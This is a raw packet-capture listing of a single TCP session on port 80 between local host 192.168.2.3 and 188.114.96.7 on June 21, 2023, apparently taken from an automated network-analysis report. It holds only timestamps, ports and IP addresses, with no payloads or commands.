Jun 21, 2023 04:27:45.505772114 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505794048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505826950 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505837917 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505860090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505892992 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505924940 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505947113 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505958080 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505966902 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505991936 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.506036997 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.506130934 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.506131887 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.506165028 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.506197929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.506231070 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.506251097 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.506263971 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.506292105 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.506324053 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.506324053 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.508212090 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.508943081 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.830370903 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.830491066 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.847426891 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.847479105 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.905075073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.905153990 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.905319929 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.976578951 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.976666927 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.993597984 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.993659019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.053653955 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.053740025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.053807974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.053900957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.053950071 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.053983927 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.054024935 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.054063082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.054107904 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.054153919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.054208040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.054280996 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.054351091 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.054500103 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.054507017 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.054624081 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.054728985 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.054786921 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.054795027 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.054841042 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.054861069 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.054893970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.054949999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.055015087 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.055016994 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.055064917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.055107117 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.055143118 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.055205107 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.055243015 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.055300951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.055368900 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.055463076 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.055548906 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.055643082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.055675983 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.055701971 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.055748940 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.055783033 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.055807114 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.055875063 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.055918932 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.056127071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.056257963 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.056396961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.056451082 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.056464911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.056519985 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.056531906 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.056591034 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.056648970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.056704998 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.056750059 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.056770086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.056921005 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.056971073 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.057033062 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.057156086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.057216883 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.057291985 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.057358980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.057406902 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.057424068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.057482958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.057528973 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.057549000 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.057607889 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.057651043 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.057671070 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.057728052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.057770967 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.057845116 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058083057 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058088064 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058159113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058180094 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058197975 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058224916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058243036 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058264017 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058268070 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058278084 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058296919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058315992 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058326006 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058326960 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058335066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058355093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058357954 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058372974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058387995 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058392048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058410883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058410883 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058429003 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058445930 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058446884 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058465958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058484077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058501959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058516026 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058520079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058537960 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058556080 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058571100 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058573961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058592081 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058595896 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058609962 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058628082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058634996 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058645964 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058664083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058681965 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058689117 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058700085 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058706045 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058717966 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058736086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058739901 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058753967 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058773041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058777094 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058793068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058811903 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058810949 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058829069 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058846951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058865070 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058881044 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058890104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058908939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058922052 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.058927059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058944941 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058963060 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058975935 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.058999062 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059026003 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059047937 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059048891 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059048891 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059061050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059078932 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059098959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059117079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059134007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059154034 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059156895 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059156895 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059166908 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059184074 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059201956 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059216022 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059231043 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059231043 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059235096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059252977 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059266090 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059266090 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059272051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059289932 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059308052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059333086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059336901 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059351921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059355974 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059370995 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059389114 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059391975 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059407949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059427977 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059431076 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059446096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059462070 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059463978 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059483051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059499979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059518099 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059523106 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059540033 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059544086 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059567928 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059595108 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059623957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059649944 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059649944 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059662104 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059674025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059695005 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059696913 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059719086 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059720039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059742928 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059745073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059763908 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059767962 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059792042 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059817076 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059833050 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059839964 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059864044 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059864998 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059889078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059890032 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059905052 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059911966 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059930086 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059933901 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059954882 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.059957981 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059982061 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.059983969 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060007095 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060009956 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060036898 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060061932 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060081959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060103893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060111046 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060120106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060137987 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060148001 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060162067 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060180902 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060203075 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060206890 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060221910 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060223103 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060240984 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060256958 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060257912 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060275078 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060291052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060312033 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060336113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060336113 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060353994 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060353994 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060372114 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060389996 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060400009 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060406923 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060410023 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060425997 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060436010 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060442924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060451031 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060458899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060475111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060476065 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060493946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060497999 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060513973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060530901 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060537100 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060548067 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060551882 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060564995 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060566902 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060583115 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060600042 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060604095 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060604095 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060616970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060623884 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060635090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060636997 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060652971 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060656071 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060669899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060672998 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060693979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060715914 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060715914 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060717106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060736895 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060738087 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060759068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060762882 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060784101 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060805082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060806036 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060826063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060830116 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060847044 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060849905 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060872078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060878038 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060890913 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060894012 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060919046 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060920000 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060944080 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060950994 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:46.060969114 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.060991049 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:46.061008930 CEST	49709	80	192.168.2.3	188.114.96.7
